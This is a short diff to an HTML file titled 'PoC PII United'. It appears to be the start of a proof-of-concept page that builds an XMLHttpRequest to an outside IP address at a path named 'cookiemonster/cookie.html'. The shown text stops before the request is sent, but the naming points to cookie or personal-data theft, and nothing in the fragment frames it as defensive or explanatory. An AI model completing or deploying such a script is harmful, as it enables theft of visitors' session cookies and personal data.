--- a/whoami.html
+++ b/whoami.html
@@ -1,6 +1,9 @@
 <html>
 <head><title>PoC PII United</title></head>
 <body>
+<div id="x">
+
+</div>	
 <script>
 var xhttp = new XMLHttpRequest();
 var url = 'http://93.66.243.251/cookiemonster/cookie.html';
